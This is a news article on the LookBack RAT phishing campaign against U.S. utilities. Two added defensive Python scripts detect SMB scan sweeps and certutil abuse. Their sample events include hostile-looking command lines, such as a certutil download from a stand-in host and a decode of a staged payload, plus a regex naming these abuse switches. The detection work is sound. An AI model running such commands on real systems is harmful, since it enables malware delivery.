
Additional U.S. Utilities Targeted With LookBack Malware

Proofpoint security researchers have observed a new series of phishing attacks targeting entities in the United States utilities sector in an attempt to deliver the LookBack remote access Trojan (RAT).

In early August, the security firm detailed a series of similar attacks on the U.S. utilities sector, in which phishing emails carried Word documents whose malicious macros were designed to install and execute the LookBack Trojan.

Now, Proofpoint says a new wave of attacks was observed between August 21 and August 29, and that additional organizations in the utilities sector were targeted. The emails impersonated a licensing body related to the utilities sector, masquerading as Global Energy Certification (GEC).

The tactics, techniques, and procedures (TTPs) are consistent with previously reported activity. Attached Word documents were once again leveraged for malware delivery.

So far, the researchers have identified at least 17 entities in the U.S. utilities sector that were targeted by these threat actors between April 5 and August 29, 2019.

The researchers also found that the attackers conducted reconnaissance scanning of future targets from a staging IP address. The scans probed TCP port 445 (SMB) for up to two weeks before the phishing emails were sent, which makes inbound 445 sweeps from a single external source a useful early-warning signal for this activity.
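The pre-phishing SMB sweep described above is something a perimeter firewall or flow log can surface before any email arrives. The script below is an added example, not code from the article or from Proofpoint: it groups port-445 hits by source address, flags any source that touched a threshold number of distinct internal hosts within a fourteen-day window, and reports how many days that activity preceded a known phishing date. The log lines are constructed and use TEST-NET addresses; the article does not name the staging IP, so 203.0.113.7 is a stand-in, and the log format and threshold are assumptions to adapt to your own data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed perimeter firewall log (TEST-NET addresses). The staging IP used in the
# real campaign is not named in the article, so 203.0.113.7 here is a stand-in.
# Fields: timestamp  src  dst  dport  action
SAMPLE_FLOWS = """\
2019-08-07T03:12:44Z 203.0.113.7 192.0.2.10 445 deny
2019-08-07T03:12:45Z 203.0.113.7 192.0.2.11 445 deny
2019-08-08T11:40:02Z 203.0.113.7 192.0.2.12 445 deny
2019-08-10T22:05:19Z 203.0.113.7 192.0.2.13 445 deny
2019-08-14T09:30:51Z 203.0.113.7 192.0.2.14 445 deny
2019-08-19T16:48:07Z 203.0.113.7 192.0.2.15 445 deny
2019-08-12T08:00:00Z 198.51.100.4 192.0.2.10 443 allow
2019-08-12T08:00:01Z 198.51.100.4 192.0.2.10 445 deny
2019-08-20T12:00:00Z 203.0.113.9 192.0.2.20 445 allow
2019-08-20T12:00:00Z 203.0.113.9 192.0.2.20 445 allow
"""


def parse_flows(text):
    """Yield (timestamp, src, dst, dport, action) tuples from the log text."""
    for line in text.splitlines():
        ts, src, dst, dport, action = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(dport), action


def smb_sweeps(text, min_hosts=5, window=timedelta(days=14)):
    """Return {src: (distinct_targets, first_seen, last_seen)} for every source that
    touched TCP/445 on at least `min_hosts` distinct destinations inside `window`.
    Denied and allowed connections both count: a blocked scan is still a scan."""
    by_src = defaultdict(list)
    for ts, src, dst, dport, _ in parse_flows(text):
        if dport == 445:
            by_src[src].append((ts, dst))
    findings = {}
    for src, hits in by_src.items():
        hits.sort()  # chronological, so a window starting at hits[i] is hits[i:] filtered
        for i, (t0, _) in enumerate(hits):
            in_window = [(t, d) for t, d in hits[i:] if t - t0 <= window]
            targets = {d for _, d in in_window}
            if len(targets) >= min_hosts:
                findings[src] = (len(targets), t0, in_window[-1][0])
                break
    return findings


def lead_time_days(findings, src, phish_sent_iso):
    """Whole days between the first scan hit from `src` and the phishing e-mail."""
    sent = datetime.strptime(phish_sent_iso, "%Y-%m-%dT%H:%M:%SZ")
    return (sent - findings[src][1]).days


if __name__ == "__main__":
    found = smb_sweeps(SAMPLE_FLOWS)
    for src, (n, first, last) in found.items():
        print(f"{src}: {n} hosts on 445 between {first:%Y-%m-%d} and {last:%Y-%m-%d}")
    # August 21 is the start of the wave reported in the article
    print("days of scanning before the phish:",
          lead_time_days(found, "203.0.113.7", "2019-08-21T09:00:00Z"))
```

Tune `min_hosts` to your own baseline and exclude authorised vulnerability scanners by address before alerting; the point is the correlation of a low-and-slow external 445 sweep with a later phishing wave, not the raw count.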

Sent from an address at the domain globalenergycertification[.]net, a look-alike of the official GEC domain, the message invited recipients to take the GEC exam administered by the Energy Research and Intelligence Institution.

In addition to the malicious Word document, the emails carried a legitimate, benign PDF: an exam-preparation guide taken from the genuine GEC site, included to make the lure more convincing.

The VBA macros in the Word document were similar to those observed in July. Once the user opens the attachment and enables macros, the macro writes several files in privacy-enhanced mail (PEM) format, that is, base64-encoded content between certificate-style BEGIN and END lines, to the host. Their contents are carried inside the document as macro variables, and once decoded they are the malware's modules.

The macro also drops a copy of the legitimate Windows certutil.exe utility onto the victim's machine and uses it to decode those files. The decoded PEM files are a GUP proxy tool, a malicious loader, and a file containing command-and-control (C&C) configuration data.

The attackers modified the macros in the recent campaign by adding more variables that are referenced when the Word document is opened and macros are enabled. These variables, likely an obfuscation attempt, are used in the installation of the malicious loader. The C&C server used in this campaign, 103.253.41[.]45, is the same one seen in the July attacks.
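The delivery chain above (macro writes PEM-armoured base64 files, a dropped copy of certutil decodes them) leaves a distinctive trace in process-creation telemetry. The script below is an added example, not code from the article or from Proofpoint. It first shows what certutil's decode step actually does to such a file, then runs a small detector over constructed Sysmon-style process-creation events: it keys on the OriginalFileName field from the PE version resource, which a renamed copy of certutil still reports as CertUtil.exe, and flags renamed copies, decode/download switches, and Office parents. The PEM blob, file names, paths and events are all constructed for the example and are not indicators from the report.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed stand-in for one of the dropped PEM files: certutil -encode style
# armour around a base64 body. The body is a harmless placeholder, not LookBack.
PEM_BLOB = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(b"placeholder module bytes, not a real PE").decode()
    + "-----END CERTIFICATE-----\n"
)


def certutil_style_decode(text):
    """Do what `certutil -decode <in> <out>` does to such a file: discard the
    BEGIN/END armour lines and base64-decode everything in between."""
    body = "".join(ln for ln in text.splitlines() if ln and not ln.startswith("-----"))
    return base64.b64decode(body, validate=True)


# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# Paths and file names are hypothetical, not indicators from the report.
SAMPLE_EVENTS = [
    {   # routine admin use: genuine binary, benign switch, launched from a shell
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": "certutil -verify server.cer",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # macro-dropped, renamed copy decoding a staged PEM file under Word
        "Image": r"C:\Users\alice\AppData\Local\Temp\tcm.tmp",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"tcm.tmp -decode C:\Users\alice\AppData\Local\Temp\stage1.pem stage1.dll",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # genuine binary abused as a downloader from an Office parent
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": "certutil -urlcache -split -f http://example.invalid/x.txt x.txt",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
]

ABUSE_SWITCHES = re.compile(r"(?i)(?:^|\s)-(?:decode|decodehex|urlcache)\b")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def certutil_alerts(events):
    """Return [(image_path, [reasons])] for events that look like certutil abuse.
    OriginalFileName comes from the PE version resource, so a renamed copy still
    identifies itself as CertUtil.exe even when the on-disk name is anything else."""
    alerts = []
    for ev in events:
        if ev.get("OriginalFileName", "").lower() != "certutil.exe":
            continue
        image = PureWindowsPath(ev["Image"]).name.lower()
        parent = PureWindowsPath(ev["ParentImage"]).name.lower()
        reasons = []
        if image != "certutil.exe":
            reasons.append(f"renamed copy of certutil ({image})")
        if ABUSE_SWITCHES.search(ev["CommandLine"]):
            reasons.append("decode/download switch on command line")
        if parent in OFFICE_PARENTS:
            reasons.append(f"spawned by Office process ({parent})")
        if reasons:
            alerts.append((ev["Image"], reasons))
    return alerts


if __name__ == "__main__":
    print(certutil_style_decode(PEM_BLOB))
    for image, reasons in certutil_alerts(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

Plain Windows 4688 events do not carry OriginalFileName, so a rule built only on the image name misses the renamed copy entirely; Sysmon or an EDR that records the version resource is what makes the first check work. Any certutil decode whose parent is an Office application is worth an alert on its own, regardless of the binary's name.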

“The evolution of TTPs including updated macros demonstrates a further departure from tactics previously employed by known APT groups. However, at the current moment, the creators of LookBack malware are yet to depart from their persistent focus on critical infrastructure providers in the United States,” Proofpoint concludes.

Related: New “LookBack” Malware Used in Attacks Against U.S. Utilities Sector

Related: Hackers Behind ‘Triton’ Malware Target Electric Utilities in US, APAC

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
